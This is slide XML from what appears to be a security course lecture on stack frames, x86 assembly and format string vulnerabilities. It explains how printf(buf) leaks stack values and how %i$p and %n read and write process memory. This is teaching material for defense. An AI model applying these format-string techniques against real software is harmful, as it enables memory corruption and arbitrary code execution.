          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2880"/>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77612" name="Oval 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2976"/>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77613" name="Oval 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="3072"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177614" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="21145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saved_eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177615" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="12001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argc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177616" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1485900"/>
            <a:ext cx="2057400" cy="6286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argv</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177617" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="50292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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177618" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="531495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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177619" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="56007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pc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177620" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="1200150"/>
            <a:ext cx="152400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66667"/>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77621" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="2114550"/>
            <a:ext cx="152400" cy="2171700"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 158333"/>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77622" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="24003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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>saved_ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177623" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="15464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main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177624" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="30323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func()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1177625" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1177619" idx="1"/>
            <a:endCxn id="1177607" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="3114675"/>
            <a:ext cx="1588" cy="2628900"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -48300005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1177626" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1177617" idx="1"/>
            <a:endCxn id="1177622" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2543175"/>
            <a:ext cx="1588" cy="2628900"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177628" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="42862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i="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>free </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177629" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001000" y="2400300"/>
            <a:ext cx="533400" cy="285750"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1177633" name="AutoShape 33"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="4953000" y="2686051"/>
            <a:ext cx="1524000" cy="2771775"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>main() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4102894"/>
            <a:ext cx="1912703" cy="338554"/>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dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228602" y="4388644"/>
            <a:ext cx="2378075"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dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4731544"/>
            <a:ext cx="2362200"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a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14912221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82" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Data Definition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1044483" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Constants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hexadecimal numbers start with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data objects are defined in a data segment using the syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>label     type    data1, data2, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Types can be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DB: Byte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DW: Word (16 bits)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DD: Double word (32 bits)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DQ: Quad word (64 bits)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>myvar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		DD  0x12345678, 0x23456789	# Two 32-bit values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  bar		DW  0x1234 					# 16-bit data object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mystr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		DB 	"foo", 0   				# Null-terminated string</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="115628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4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4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4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44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444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444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4448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4448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4448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4448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4448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4448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44483">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4448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Lessons Learned	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loops must be thoroughly checked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User-supplied input should not lead to arbitrary loop iterations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Off-by-one vulnerabilities can cause crashes and also the execution of arbitrary code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181780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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is Overwritten:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Format String Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="986115" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whenever a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(... char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>...) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>function is used with user-supplied input it is possible to read/write values in the process memory by providing a carefully crafted format string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("Hello %s!\n", name); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is not! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will be interpreted as a format string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>="%d %d"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If parameters are missing, values from the stack are used instead</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1821719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6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6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861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861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861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Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’s Lesser Known Facts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is possible to reference the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> element on the argument list using the notation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i$p</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note: This does not cause an argument to be popped from the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is possible to specify the amount of characters being printed using the notation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>kp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is found, the number of output characters processed is stored at the address passed as the next argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
